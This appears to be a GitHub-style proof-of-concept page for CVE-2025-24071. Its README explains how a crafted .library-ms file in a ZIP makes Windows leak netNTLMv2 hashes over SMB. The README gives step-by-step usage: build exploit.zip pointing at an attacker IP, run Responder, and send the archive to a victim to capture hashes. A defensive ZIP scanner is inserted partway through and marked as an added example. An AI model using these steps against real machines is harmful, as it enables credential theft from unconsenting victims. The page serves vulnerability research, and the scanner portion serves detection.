CVE-2025-24071 PoC — Microsoft Windows File Explorer Information Disclosure Vulnerability

Source
Associated Vulnerability
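Title: Microsoft Windows File Explorer Information Disclosure Vulnerability (CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft (United States). Microsoft Windows File Explorer contains an information disclosure vulnerability. An attacker can exploit this vulnerability to obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server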
Readme
# CVE-2025-24071

This Python script demonstrates the **CVE-2025-24071** vulnerability in Windows Explorer. The vulnerability allows an attacker to capture a victim's **netNTLMv2** credentials with no interaction from the victim beyond extracting a ZIP archive.

## Description

The **CVE-2025-24071** vulnerability exists in the way Windows handles `.library-ms` files inside ZIP archives. When a ZIP file containing a malicious `.library-ms` file is extracted, Windows automatically attempts to access an SMB location specified in the file, which may result in exposing the victim's credentials to the attacker's server.

This script generates a ZIP file containing a malicious `.library-ms` file. When a victim extracts the ZIP file, the system automatically tries to connect to the SMB location specified in the file, sending **netNTLMv2** credentials to the attacker without any further interaction from the victim.

## How It Works

1. The script takes the **attacker's IP address** as an argument and inserts it into an XML file that defines a `.library-ms` file. This file instructs Windows to connect to a shared resource at the attacker's IP address.
   
2. The `.library-ms` file is then placed inside a ZIP file named `exploit.zip`.

3. When the victim extracts the ZIP file, Windows processes the `.library-ms` file and, due to the vulnerability, automatically establishes an SMB connection to the attacker's server.

4. The attacker can capture the **netNTLMv2** credentials using tools like **Responder**, without the victim needing to take any further action.
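
From the defender's side, the archive layout described above can be checked before extraction. The following is an added example, not part of the original PoC or README: it lists the `.library-ms` members of a ZIP and reports any remote UNC or `file://` location they reference. The function names, the 1 MiB read cap and the constructed sample archive (stand-in XML body, documentation-range IP) are assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# UNC path (\\host\share) or file://host/share URL pointing at a remote host.
REMOTE_RE = re.compile(r"^\s*(?:\\\\[^\\/\s]+[\\/][^\s]+|file://[^/\s]+/\S+)", re.I)


def remote_targets(xml_bytes):
    """Return remote SMB-style locations found in any element text or attribute."""
    try:
        root = ET.fromstring(xml_bytes)  # parsing also decodes &#92;-style escapes
    except ET.ParseError:
        # Unparseable member: fall back to a raw scan so it is not silently skipped.
        text = xml_bytes.decode("utf-8", "replace")
        return re.findall(r"\\\\[^\\/\s<>]+[\\/][^\s<>]+", text)
    hits = []
    for el in root.iter():
        for value in [el.text or "", *el.attrib.values()]:
            if REMOTE_RE.match(value):
                hits.append(value.strip())
    return hits


def scan_zip(data):
    """Map each .library-ms member of a ZIP (bytes) to the remote paths it references."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                # Cap the read so a decompression bomb cannot exhaust memory.
                with zf.open(info) as fh:
                    findings[info.filename] = remote_targets(fh.read(1 << 20))
    return findings


def build_sample(location):
    """Constructed test archive; the XML is a stand-in, not a valid library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/report.library-ms",
                    f"<sample><location>{location}</location></sample>")
        zf.writestr("readme.txt", r"\\192.0.2.10\share")  # not a library file: ignored
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_zip(build_sample(r"\\192.0.2.10\share")))
```

A mail or web gateway can run `scan_zip` on inbound archives and quarantine any whose result contains a non-empty list.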

## Requirements

- Python 3.x
- Modules: `zipfile`, `os`, `argparse`

## Usage

1. **Generate the malicious file**:

```bash
python exploit.py --ip <ATTACKER_IP>
```

2. Once the malicious file is generated, ensure that Responder is running and listening for the **netNTLMv2** hashes.

```bash
responder -I <INTERFACE>
```

3. Send the generated `exploit.zip` file to the victim. When they extract the file, Windows will attempt to connect to the SMB server specified in the `.library-ms` file.

4. Once the victim extracts the ZIP file and Windows attempts the SMB connection, **Responder** will capture the **netNTLMv2** hashes from the victim.

## Disclaimer

This script is intended for educational and testing purposes in controlled environments. The malicious use of this vulnerability may be illegal and against the laws and regulations of many countries. Use this script only on systems that you have permission to audit and always with proper authorization.
File Snapshot

[4.0K] /data/pocs/a859d556d51a34d116d1a0c98499ddf7a2e9d201
├── [ 947] poc.py
└── [2.5K] README.md

0 directories, 2 files